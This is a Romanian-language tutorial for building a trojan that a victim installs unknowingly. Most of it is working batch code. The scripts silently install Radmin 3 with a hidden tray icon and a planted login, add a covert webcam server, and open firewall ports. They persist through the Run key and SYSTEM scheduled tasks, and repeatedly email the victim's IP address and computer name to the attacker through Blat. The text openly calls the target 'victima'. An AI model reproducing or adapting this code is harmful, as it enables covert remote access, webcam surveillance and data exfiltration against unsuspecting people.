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Remote Control (Radmin 3 + IP pe mail+ RemCam) Remote Control (Radmin 3 + IP pe mail+ RemCam) In tutorialul urmator am sa va arat cum facem un tojan cu care sa avem remote desktop,cmd,remote file(radmin) sa avem acces si la web camera + ip-ul victimei sa ne vina pe mail
Downloadam Radmin 3 Îl face instal cu un cadru liniştit şi adăugam unu utilizator nou prin intermediul registrului Pentru aceasta trebuie să facem un fisier .bat radmin_install.bat Quote: @echo off :eschide instal radmin linistit fara a face restart start msiexec.exe /i "radmin.msi" /quiet /norestart
::Prin aceasta ascundem iconul reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server" /v HideTrayIcon /t REG_DWORD /d 1 /f
::Verificam daca nu a mai fost instalat radmin cu un alt user For /F "tokens=1" %%a in ('reg query "HKLM\SOFTWARE\Radmin\v3.0\Server\Parameters\Radmin Security\1"') do set regpath=%%a If DEFINED regpath (goto make_user2) Else (goto add_user)
:aca a fost, cream un user nou :make_user2 echo Windows Registry Editor Version 5.00 > log_pass.reg echo. >> log_pass.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server\Parameters\Radmin Security\10] >> log_pass.reg copy /b log_pass.reg + user.txt reg import log_pass.reg && del log_pass.reg exit
:aca nu a fost il facem noi pe primul :add_user echo Windows Registry Editor Version 5.00 > log_pass.reg echo. >> log_pass.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server\Parameters\Radmin Security\1] >> log_pass.reg copy /b log_pass.reg + user.txt reg import log_pass.reg && del log_pass.reg exit Aceasta creează un fişier de registru pentru utilizator
Este necesar să se facă un fişier text cu numele de utilizator şi parola user.txt Quote: "1"=hex:10,00,00,08,75,00,73,00,65,00,72,00,30,00,01,00,98,47,fc,7e,0f,89,1d,\ fd,5d,02,f1,9d,58,7d,8f,77,ae,c0,b9,80,d4,30,4b,01,13,b4,06,f2,3e,2c,ec,58,\ ca,fc,a0,4a,53,e3,6f,b6,8e,0c,3b,ff,92,cf,33,57,86,b0,db,e6,0d,fe,41,78,ef,\ 2f,cd,2a,4d,d0,99,47,ff,d8,df,96,fd,0f,9e,29,81,a3,2d,a9,55,03,34,2e,ca,9f,\ 08,06,2c,bd,d4,ac,2d,7c,df,81,0d,b4,db,96,db,70,10,22,66,26,1c,d3,f8,bd,d5,\ 6a,10,2f,c6,ce,ed,bb,a5,ea,e9,9e,61,27,bd,d9,52,f7,a0,d1,8a,79,02,1c,88,1a,\ e6,3e,c4,b3,59,03,87,f5,48,59,8f,2c,b8,f9,0d,ea,36,fc,4f,80,c5,47,3f,db,6b,\ 0c,6b,db,0f,db,af,46,01,f5,60,dd,14,91,67,ea,12,5d,b8,ad,34,fd,0f,d4,53,50,\ de,c7,2c,fb,3b,52,8b,a2,33,2d,60,91,ac,ea,89,df,d0,6c,9c,4d,18,f6,97,24,5b,\ d2,ac,92,78,b9,2b,fe,7d,ba,fa,a0,c4,3b,40,a7,1f,19,30,eb,c4,fd,24,c9,e5,a2,\ e5,a4,cc,f5,d7,f5,15,44,d7,0b,2b,ca,4a,f5,b8,d3,7b,37,9f,d7,74,0a,68,2f,40,\ 00,00,01,05,50,00,00,20,70,8d,ff,a4,d4,0d,97,d4,4f,61,1d,07,fa,48,2d,cc,f7,\ 9f,a6,89,b5,12,3c,08,f9,cf,9c,9e,7b,56,aa,d8,60,00,01,00,5c,c7,67,0b,48,c1,\ 01,cd,b6,91,ff,aa,d1,11,a8,ab,9b,e5,97,07,44,05,ef,44,4b,96,a1,ac,d0,5e,13,\ 88,cf,87,76,dc,e0,31,73,cf,35,3d,ef,e6,ba,9c,90,5d,e7,2b,7c,61,35,f6,87,0b,\ f0,8d,9f,a2,78,21,27,e2,0c,8c,1b,76,59,25,78,5b,9c,18,26,db,47,5f,13,b7,40,\ bd,3d,17,49,34,f5,c4,60,81,f7,0c,7c,c5,2a,c6,57,a6,52,8d,ed,75,71,c1,26,d4,\ a2,79,e6,f9,18,13,f1,e6,55,ba,06,6c,ba,b5,4c,7a,1f,e4,96,16,5a,4b,1b,42,91,\ dd,8b,c1,aa,45,b8,15,8b,2d,be,c2,08,8a,24,5f,97,1b,7c,9f,8c,8e,5c,83,ee,83,\ ac,f3,3b,c8,36,aa,f4,12,0f,8e,43,05,e5,a6,23,80,14,1c,dd,df,cf,2b,c5,3c,ef,\ c4,84,60,87,f2,82,a1,e0,b9,53,d2,af,e6,1c,30,91,46,55,b9,18,de,54,42,86,3f,\ 18,4e,cc,8d,6e,35,e9,9c,b2,04,21,c5,75,4d,17,eb,f8,78,b2,f9,11,4a,23,2c,97,\ 49,64,14,01,76,63,1a,5e,50,e2,bc,91,9f,4b,c0,b1,95,0d,4e,49,46,04,c4,9d,71,\ 20,00,00,04,ff,01,00,00 La sfirsit neaparat trebue sa fie 2 lini goale. Asa arata login si parola utilizatorului hexat.
Aici sunt urmatoarele date: Login: user Parola: radminuser
Deasemena puteti sa adaugati un utilizator cu ce date doriti Pentru asta, instalati radmin 3 si creativa un user cu parola.. Dupa care exportati fisierul: HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server\Par ameters\Radmin Security\1 Va fi aceiasi ca user.txt numai ca cu datele utilizatorului creat de voi
Acum noi avem: 1) radmin.msi 2) radmin_install.bat 3) user.txt Este de dorit sa le lipim pe toate impreuna cu ajutorul programului: bat_to_exe converter Configuram similar ca in imagine
Ne ducem la include urcam celelalte 2 fisiere(radmin.msi и user.txt) Facem clic pe Compile Cu Radminulo am terminat!
Ip pe mail Daca victima noastra are internet 3G la fiecare conectare la internet este posibil sa i se schimbe ip-ul asa ca va propun sa folositi optiunea "Ping" care la fiecare conectare raporteaza pe mail daca victima are alt ip.
Incepem cu WinVer(Joaca un rol important) WinVer.bat Quote: @echo off :: Vedem ce fel de windows e instalat for /f "tokens=2*" %%a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName ^| find "ProductName"') do set ProductName=%%b if "%ProductName%" == "Microsoft Windows 2000" (goto IP) if "%ProductName%" == "Microsoft Windows XP" (goto IP) if "%ProductName%" == "Windows Vista ™ Ultimate" (goto IPv4) if "%ProductName%" == "Windows Vista ™ Enterprise" (goto IPv4) if "%ProductName%" == "Windows Vista ™ Business" (goto IPv4) if "%ProductName%" == "Windows Vista ™ Home Premium" (goto IPv4) if "%ProductName%" == "Windows Vista ™ Home Basic" (goto IPv4) if "%ProductName%" == "Windows Vista ™ Starter" (goto IPv4) if "%ProductName%" == "Windows Vista Ultimate" (goto IPv4) if "%ProductName%" == "Windows Vista Enterprise" (goto IPv4) if "%ProductName%" == "Windows Vista Business" (goto IPv4) if "%ProductName%" == "Windows Vista Home Premium" (goto IPv4) if "%ProductName%" == "Windows Vista Home Basic" (goto IPv4) if "%ProductName%" == "Windows Vista Starter" (goto IPv4) if "%ProductName%" == "Windows 7 Ultimate" (goto IPv4) if "%ProductName%" == "Windows 7 Enterprise" (goto IPv4) if "%ProductName%" == "Windows 7 Professional" (goto IPv4) if "%ProductName%" == "Windows 7 Home Premium" (goto IPv4) if "%ProductName%" == "Windows 7 Home Basic" (goto IPv4) if "%ProductName%" == "Windows 7 Starter" (goto IPv4) if "%ProductName%" == "%ProductName%" (goto IP)
:: Dac e ХР sau 2000 Vom folosi IP :IP echo start /d sysfiles\ send_IP.exe >> ..\ping.bat echo exit >> ..\ping.bat schtasks /create /tn "security" /sc minute /mo 30 /ru "NT AUTHORITY\SYSTEM" /tr "%SystemRoot%\system32\ping.bat schtasks /create /tn "security" /sc minute /mo 30 /ru "NT AUTHORITY\SYSTEM" /tr "%SystemRoot%\system32\sysfiles\send_IP.exe" del send_IPv4.exe exit
:: Daca e ХР sau 2000 vom folosi IPv4 :IPv4 echo start /d sysfiles\ send_IPv4.exe >> ..\ping.bat echo exit >> ..\ping.bat schtasks /create /tn "security" /sc minute /mo 30 /ru "NT AUTHORITY\SYSTEM" /tr "%SystemRoot%\system32\ping.bat /f schtasks /create /tn "security" /sc minute /mo 30 /ru "NT AUTHORITY\SYSTEM" /tr "%SystemRoot%\system32\sysfiles\send_IPv4.exe" /f del send_IP.exe exit Daca veti folosi "Ping", atunci stergeti textul marcat cu rosu Daca nu veti folosi "Ping",atunci stergeti textul marcat cu albastru
Insusi Pingul pentru verificarea ip-ului. Ping.bat Code: @echo off ping -n 5 >nul if %errorlevel%==0 (goto send) else (goto end)
:end exit
:send La sfirsit neaparat trebue sa fie un rind gol.
Mergem mai departe. Neaparat ferificam schimbarea si trimiterea ip-ului pe mail. Send_IP.bat Quote: @echo off set mail=blat.exe send.txt -to mailul_vostruIn PM
if not exist ip1.txt (if not exist ip3.txt del ip3.txt 3.txt & ipconfig /all > ip1.txt & Echo %COMPUTERNAME% > 1.txt & findstr "IP" ip1.txt >> 1.txt) else (goto test1)
:test1 if exist ip2.txt (goto test2) else (ipconfig /all > ip2.txt & Echo %COMPUTERNAME% > 2.txt & findstr "IP" ip2.txt >> 2.txt) del ip3.txt 3.txt fc 1.txt 2.txt IF %ERRORLEVEL% == 1 (copy /y 2.txt send.txt | %mail%) exit
:test2 if exist ip3.txt (goto test3) else (ipconfig /all > ip3.txt & Echo %COMPUTERNAME% > 3.txt & findstr "IP" ip3.txt >> 3.txt) del ip1.txt 1.txt fc 2.txt 3.txt IF %ERRORLEVEL% == 1 (copy /y 3.txt send.txt | %mail%) exit
:test3 if exist ip1.txt (goto test1) else (ipconfig /all > ip1.txt & Echo %COMPUTERNAME% > 1.txt & findstr "IP" ip1.txt >> 1.txt) del ip2.txt 2.txt fc 3.txt 1.txt IF %ERRORLEVEL% == 1 (copy /y 1.txt send.txt | %mail%) exit Send_IPv4.bat Quote: @echo off set mail=blat.exe send.txt -to mailul_vostruIn PM
if not exist ip1.txt (if not exist ip3.txt del ip3.txt 3.txt & ipconfig /all > ip1.txt & Echo %COMPUTERNAME% > 1.txt & findstr "IPv4" ip1.txt >> 1.txt) else (goto test1)
:test1 if exist ip2.txt (goto test2) else (ipconfig /all > ip2.txt & Echo %COMPUTERNAME% > 2.txt & findstr "IPv4" ip2.txt >> 2.txt) del ip3.txt 3.txt fc 1.txt 2.txt IF %ERRORLEVEL% == 1 (copy /y 2.txt send.txt | %mail%) exit
:test2 if exist ip3.txt (goto test3) else (ipconfig /all > ip3.txt & Echo %COMPUTERNAME% > 3.txt & findstr "IPv4" ip3.txt >> 3.txt) del ip1.txt 1.txt fc 2.txt 3.txt IF %ERRORLEVEL% == 1 (copy /y 3.txt send.txt | %mail%) exit
:test3 if exist ip1.txt (goto test1) else (ipconfig /all > ip1.txt & Echo %COMPUTERNAME% > 1.txt & findstr "IPv4" ip1.txt >> 1.txt) del ip2.txt 2.txt fc 3.txt 1.txt IF %ERRORLEVEL% == 1 (copy /y 1.txt send.txt | %mail%) exit Deci avem urmatoarele fisiere. WinVer.bat Send_IP.bat Send_IPv4.bat Deasemenea le lipim cu ajutorul programului Bat To Exe Converter cu urmatoarele configuratii.
Ping.bat il lasam asa cum este Raportul il va trimite programul Blat Si cu asta terminam.
Acum a ramas cea mai interesanta parte sa creem chiar instalul. Principalu este sa nu te incurci Install.bat Quote: @ECHO OFF :: Este necesara pentra ca consola sa inteleaga caracterele rusesti si sa ascunda dosarul Radmin din meniu start. reg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v CodePage /t REG_DWORD /d 1251 /f reg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v FaceName /t REG_SZ /d "Lucida Console" /f reg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v FontFamily /t REG_DWORD /d 0x0000036 /f reg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v FontSize /t REG_DWORD /d 0x000c0000 /f reg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v FontWeight /t REG_DWORD /d 0x00002bc /f
:eschidem radminul nostru pregatit start radmin_install.exe
::Creem foldere pentru pastrarea fisierelor mkdir %systemroot%\system32\sysfiles mkdir %SystemRoot%\system32\sysfiles\server
::Extragem fişierele şi copiam în directorul necesare copy /y "blat.exe" "%SystemRoot%\system32\sysfiles\blat.exe" copy /y "blat.lib" "%SystemRoot%\system32\sysfiles\blat.lib" copy /y "blat.dll" "%SystemRoot%\system32\sysfiles\blat.dll" copy /y "send_IP.exe" "%SystemRoot%\system32\sysfiles\send_IP.exe" copy /y "send_IPv4.exe" "%SystemRoot%\system32\sysfiles\send_IPv4.exe" copy /y "winver.exe" "%SystemRoot%\system32\sysfiles\winver.exe" copy /y "ping.bat" "%SystemRoot%\system32\ping.bat" copy /y "cam_server.exe" "%SystemRoot%\system32\sysfiles\server\cam_server.exe"
::Adaugam exceptie FireWall-ui netsh firewall add allowedprogram "%SystemRoot%\system32\sysfiles\server\cam_server.exe" "cam_server" ENABLE
netsh firewall add portopening tcp 57011 all
::Facem configurarea Blat pentri trimiterea pe mail "%SystemRoot%\system32\sysfiles\blat.exe" -install -server smtp.In PM -port 587 -f mailulIn PM -u Login -pw Parola
::Il deschidem odata cu Windowsu-ul reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "cam_server.exe" /t REG_SZ /d "%SystemRoot%\system32\sysfiles\server\cam_server.exe pass=Parola port=57011" /f
::Prima trimitere de IP indata dupa rulare ipconfig /all > %SystemRoot%\system32\sysfiles\ip1.txt & Echo %COMPUTERNAME% > %SystemRoot%\system32\sysfiles\1.txt & findstr "IP" %SystemRoot%\system32\sysfiles\ip1.txt >> %SystemRoot%\system32\sysfiles\1.txt
"%SystemRoot%\system32\sysfiles\blat.exe" "%SystemRoot%\system32\sysfiles\1.txt" -to mailul vostruIn PM
:eschide WinVer care ne arata ce mod de trimitere a IP-ului se va utiliza cd %SystemRoot%\system32\sysfiles\ start winver.exe
:eschidem serverul Web camerei cd %SystemRoot%\system32\sysfiles\server start cam_server.exe pass=PAROLA port=57011
::Stergem ce e de prisos rmdir /s /q "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Radmin Server 3" rmdir /s /q "c:\Documents and Settings\%username%\Главное меню\Программы\Radmin Server 3" del /q "%SystemRoot%\system32\sysfiles\winver.exe"
exit Daca nu folositi RemCam doar stergeti rindurile unde se intilneste. DownloadamRemCam(In arhiva este si server si client) Aproape tot Din nou ne lipim organele cu ajutorul Bat To Exe Converter Respectind configuratile din imagine
Mergem in fila include si din nou adaugam urmatoarele fisiere: ping.bat (Daca il veti folosi) send_IP.exe send_IPv4.exe WinVer.exe radmin_install.exe cam_server.exe (Daca il veti folosi) blat.exe blat.dll blat.lib Download all bat files blat
Apoi mergem in fila Versioninformations si bagam un icon si ne bucuram de Trojan
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